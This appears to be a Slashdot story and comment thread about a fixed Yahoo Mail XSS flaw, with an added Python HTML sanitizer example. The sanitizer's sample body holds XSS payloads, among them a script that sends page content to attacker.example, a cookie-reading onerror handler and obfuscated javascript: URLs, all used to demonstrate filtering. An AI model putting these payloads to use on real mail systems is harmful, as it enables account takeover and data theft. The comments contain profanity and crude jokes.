Yahoo Fixes Bug That Could Compromise Email Accounts When Opening an Email (klikki.fi)
An anonymous reader writes: Yahoo! has fixed a cross-site scripting bug that would have allowed attackers to fully compromise email accounts just by sending a malicious email. To lose control over their accounts, victims needed only to open the email. The researcher who discovered the bug said, "The code would be automatically evaluated when the message was viewed. ... We provided Yahoo with a proof of concept email that would forward the victim user's inbox to an external website, and an email virus which infects the Yahoo Mail account and attaches itself to all outgoing emails. The bug was fixed before any known exploits 'in the wild.'" Yahoo!'s bounty program awarded $10,000 for the research.
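The defect described above is a webmail client inserting the message's HTML into the page as-is, so any script the sender embedded runs with the victim's session. The example below is added here to show that defect beside the standard fix; it is not Yahoo's code and not the klikki.fi proof of concept. The allowlist of tags and attributes, the `attacker.example` host and the sample message body are this example's own assumptions. A production mail client would pair this with a maintained sanitizer and a Content-Security-Policy that forbids inline script rather than rely on a hand-written filter alone.

```python
"""Allowlist sanitizer for untrusted HTML email bodies (added example)."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"a", "b", "i", "u", "em", "strong", "p", "br", "ul", "ol",
                "li", "blockquote", "img", "span", "div"}
VOID_TAGS = {"br", "img"}
# Attributes are allowlisted per tag; on* handlers and style are never listed.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# These elements are removed together with everything inside them.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math"}


def safe_url(value):
    """True if the URL is relative or uses an allowlisted scheme."""
    # Browsers ignore tabs, newlines and control characters inside a URL,
    # so "java\tscript:" still executes; strip them before reading the scheme.
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace())
    try:
        scheme = urlsplit(cleaned).scheme   # urlsplit lowercases the scheme
    except ValueError:
        return False
    return scheme == "" or scheme in ALLOWED_SCHEMES


class EmailHtmlSanitizer(HTMLParser):
    """Re-serializes only the allowlisted subset of the parsed HTML."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []      # tags emitted and not yet closed
        self.skip_depth = 0      # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return               # unknown tag dropped, its text is kept
        parts = [tag]
        for name, value in attrs:  # names are lowercased, values unescaped
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS and not safe_url(value):
                continue
            parts.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:    # close anything left open inside this tag
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass                     # comments (incl. conditional ones) dropped

    def result(self):
        self.close()
        while self.open_tags:    # balance tags the sender left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_email_html(body):
    parser = EmailHtmlSanitizer()
    parser.feed(body)
    return parser.result()


def render_vulnerable(body):
    """The defect: the message body goes into the page unchanged."""
    return f'<div class="message">{body}</div>'


def render_hardened(body):
    return f'<div class="message">{sanitize_email_html(body)}</div>'


# Constructed sample modelled on the described attack (exfiltrate the page)
# plus the handler and URL-scheme tricks a sanitizer must also catch.
SAMPLE_BODY = (
    '<p>Hi!</p>'
    '<script>fetch("https://attacker.example/?d=" + document.body.innerHTML)</script>'
    '<IMG SRC="x" onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a>'
    '<a href="&#106;ava\tscript:alert(1)">x</a>'
    '<a href="https://example.com/" onclick="evil()">ok</a>'
    '<div style="background:url(javascript:alert(1))">t</div>'
)

if __name__ == "__main__":
    print(render_vulnerable(SAMPLE_BODY))
    print(render_hardened(SAMPLE_BODY))
```

The allowlist approach matters more than the specific lists: a denylist of known-bad tags misses the next obfuscation (here the entity-encoded and tab-split `javascript:` URLs and the uppercase `IMG` with an `onerror` handler), whereas anything not explicitly permitted is simply never re-emitted.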
Because not all of the skilled and talented people out there are asshats willing to sell out security to make a quick buck?
The number of people affected was 5 of the 11 people who still use Yahoo! mail.
This fix will make it harder to get my hot ex-gf's nudie pics.
For yahoo mail? really?
Why would blackhats buy an exploit for an email provider with a userbase of 3?
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
I have one because of my ISP. I know people who have had their Yahoo address so long they keep it out of sheer inertia.
To me this comes down to the fundamental problem: why the hell do we keep trusting websites to run arbitrary scripts? And why the hell do we trust 3rd party scripts in web pages?
So some greedy bastard can give you an ad?
The average Yahoo user likely doesn't use script blockers, and isn't going to start out blocking them only to whitelist what they want.
I can barely convince my wife to keep using the script blocker I've put into her Chrome to block all this shit.
At this point, the entire web has been written on the moronic assumption that people should just let everything run, which leads to stuff like this.
What we need to do is look at this stuff, and remove the default trust ... and what the ad and analytics companies want be damned. They're as much part of the problem as anything, and as often as not they end up serving up the malware in the first place.
Yes, Yahoo has some stuff they need to fix ... but I don't see this as being any more vulnerable than what your average web page expects you to do.
Lost at C:>. Found at C.
More than you'd suspect. AT&T was using Yahoo to provide email services for their DSL customers.
I have one because of my ISP. I know people who have had their Yahoo address so long they keep it out of sheer inertia.
To me this comes down to the fundamental problem: why the hell do we keep trusting websites to run arbitrary scripts?
Because it's a free service, you cheap bastard.
And why the hell do we trust 3rd party scripts in web pages? So some greedy bastard can give you an ad?
Yes, because that "greedy" provider on the other end has to have some ability to pay for the service they're giving away for free to cheap bastards like yourself.
The average Yahoo user likely doesn't use script blockers, and isn't going to start out blocking them only to whitelist what they want.
I can barely convince my wife to keep using the script blocker I've put into her Chrome to block all this shit.
That's OK, I can barely convince people that the concept you get what you pay for is still a valid one, you cheap bastard.
At this point, the entire web has been written on the moronic assumption that people should just let everything run, which leads to stuff like this.
At this point, no one on the internet thinks that online services like email should be anything but free, leading to a moronic web built by and for cheap bastards.
What we need to do is look at this stuff, and remove the default trust ... and what the ad and analytics companies want be damned. They're as much part of the problem as anything, and as often as not they end up serving up the malware in the first place.
Yes, Yahoo has some stuff they need to fix ... but I don't see this as being any more vulnerable than what your average web page expects you to do.
What we need to do is look at society and start understanding that "free" has some significant cost to it for all of us. Unfortunately, it's not likely to do much good. I didn't expect the world to be so full of cheap bastards...
This has been said a million times before but...
Why on Earth is an email reader running any code that happens to be in an email message?
The bug is that the email reader does not just display the raw ASCII text of the message.
I bet they have not fixed that.
$10,000 is 50 man-hours, roughly. So, unless it took less than that to discover the bug, it's not economically viable with US workers.
And when you consider the potential economic damage that could be caused to Yahoo! if this bug were exploited by people with nefarious intent, $10,000 is downright pathetic.
Whatever, I'm sure everyone will disagree with me because techies have the money sense of a teenager.
Ha! Corporations love the free market until they don't! Must be nice to get all the benefits of being a person under the law without all those messy morals and conscience.
I stopped using Yahoo webmail when I found out that XSS would allow your account to be hijacked if you were merely logged in while viewing a site that included a malicious script.
Thanks, Marissa!
Ads are how we've decided that web-based services are paid for, given the lack of convenient and efficient micro-payments. However, you don't need scripts to have ads. Static images or even text work just fine. Hell, ads printed in ink on paper have paid for newspapers for a hundred years or more. So to whatever extent ads are needed to pay for "free" web sites, that does NOT imply that third-party scripts are required.
Adblock Plus has an option to allow unobtrusive ads. This is the right balance. I will use your free service and accept the ads you serve up that don't compromise my security with shifty JavaScript, and that don't behave obnoxiously in order to forcibly tear my attention away from what I care about.
I am not a cheap bastard for wanting the ads that pay for my services to be safe and unobtrusive. Of course, I am not the OP either.
for reals.
I got a Yahoo email when they first came out, before Gmail was a thing. It makes a great honeypot email address for websites that need a legit email to work (FYI - My corresponding name is John Doe and I live at 123 Fuckoff St., Anywhere, Zimbabwe). I sure as hell don't bother logging in to open or read anything in there - I'm sure there is crap in there that would make Goatse look suitable for the cover of a mother's day card. When (not if) Yahoo finally gasps its last and dies, I'll be sad for the whole two seconds it takes to set up a new throw away account.
Left MS Windows for Linux Mint and never looked back!
Vote for Bernie in 2016!
I take it you have to run a script in the email while reading it with the Yahoo web client open, so using a local client is safe. (I don't open mail from people I don't know anyway... and even then, scripts and images are disabled in my client.)
I was able to get myfirstname.mylastname@yahoo.com, so not only do I still use it, but I pay $20 annually for IMAP/SMTP access. I use Thunderbird or iOS Mail to read my mail and only rarely and occasionally use the web client to read mail.
However, their stupid security settings require that I sign into the web client every two weeks to re-enable IMAP.
I can see the fnords!
They still are; my ancient @bellsouth.net email address was migrated to the att.yahoo.com interface a few years ago.
Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
... assuming only the yahoo domains were allowed?
Ditto for my Ameritech dot net email.
Like everyone everywhere is able to pay recurring fees for every little thing, yearly or monthly for decades on.
If you could get something like a lifetime subscription for mail at $100 I guess many would sign up (includes a choice of webmail like roundcube, squirrel etc.)
Perhaps $50, perhaps long term (20 years or delete after 5 years you didn't log in)
We're not only not willing to pay. Once you're paying for email, you have to keep paying (and have a valid debit card or banking account, etc.).
You may pay for a domain name, perhaps have some redirection trickery going on, so conceivably it would be no big deal to lose that email service. But then, here's your domain recurring fee and renewal. It feels like hackers and tech companies have trouble renewing their domains (perhaps the rule of domains is: if you get a domain, you forget about it until the last minute). So imagine your grandma paying recurring fees she doesn't know how to cancel, AND she lost her domain.
I'll even pay for an email service that doesn't support html and discards pictures, if you let me pay once and only once.
Yahoo, a multi-million-, possibly billion-dollar company, can't secure their own goddamn webmail, and this is after having ~20 years of experience as an email provider.
Fucking fabulous, great job guys, you da man.
Just cruising through this digital world at 33 1/3 rpm...
To lose control over their accounts, victims needed only to open the email. The researcher who discovered the bug said, "The code would be automatically evaluated when the message was viewed. ...
Hmmm, I thought this kind of crap only happened with Outlook.